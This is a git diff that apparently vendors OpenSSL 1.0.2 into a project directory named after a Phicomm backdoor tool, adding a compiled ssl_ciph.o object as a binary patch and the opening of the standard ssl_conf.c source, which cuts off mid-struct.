diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_ciph.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_ciph.o
new file mode 100644
index 0000000000000000000000000000000000000000..1f76ca632adc0fa565a377a6d74c1b6af10df27c
GIT binary patch
literal 31328
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
Kbf)SI(f<#ygT_+;

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_conf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_conf.c
new file mode 100644
index 0000000..0ee6e46
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_conf.c
@@ -0,0 +1,668 @@
+/*
+ * ! \file ssl/ssl_conf.c \brief SSL configuration functions
+ */
+/* ====================================================================
+ * Copyright (c) 2012 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifdef REF_CHECK
+# include <assert.h>
+#endif
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/conf.h>
+#include <openssl/objects.h>
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+
+/*
+ * structure holding name tables. This is used for pemitted elements in lists
+ * such as TLSv1 and single command line switches such as no_tls1
+ */
+
+typedef struct {
+    const char *name;
+    int namelen;
+    unsigned int name_flags;
+    unsigned long option_value;
+} ssl_flag_tbl;
+
+/* Sense of name is inverted e.g. "TLSv1" will clear SSL_OP_NO_TLSv1 */
+#define SSL_TFLAG_INV   0x1
+/* Flags refers to cert_flags not options */
+#define SSL_TFLAG_CERT  0x2
+/* Option can only be used for clients */
+#define SSL_TFLAG_CLIENT SSL_CONF_FLAG_CLIENT
+/* Option can only be used for servers */
+#define SSL_TFLAG_SERVER SSL_CONF_FLAG_SERVER
+#define SSL_TFLAG_BOTH (SSL_TFLAG_CLIENT|SSL_TFLAG_SERVER)
+
+#define SSL_FLAG_TBL(str, flag) \
+        {str, (int)(sizeof(str) - 1), SSL_TFLAG_BOTH, flag}
+#define SSL_FLAG_TBL_SRV(str, flag) \
+        {str, (int)(sizeof(str) - 1), SSL_TFLAG_SERVER, flag}
+#define SSL_FLAG_TBL_CLI(str, flag) \
+        {str, (int)(sizeof(str) - 1), SSL_TFLAG_CLIENT, flag}
+#define SSL_FLAG_TBL_INV(str, flag) \
+        {str, (int)(sizeof(str) - 1), SSL_TFLAG_INV|SSL_TFLAG_BOTH, flag}
+#define SSL_FLAG_TBL_SRV_INV(str, flag) \
+        {str, (int)(sizeof(str) - 1), SSL_TFLAG_INV|SSL_TFLAG_SERVER, flag}
+#define SSL_FLAG_TBL_CERT(str, flag) \
+        {str, (int)(sizeof(str) - 1), SSL_TFLAG_CERT|SSL_TFLAG_BOTH, flag}
+
+/*
+ * Opaque structure containing SSL configuration context.
+ */
+
+struct ssl_conf_ctx_st {
+    /*
+     * Various flags indicating (among other things) which options we will
+     * recognise.
+     */
+    unsigned int flags;
+    /* Prefix and length of commands */
+    char *prefix;
+    size_t prefixlen;
+    /* SSL_CTX or SSL structure to perform operations on */
+    SSL_CTX *ctx;
+    SSL *ssl;
+    /* Pointer to SSL or SSL_CTX options field or NULL if none */
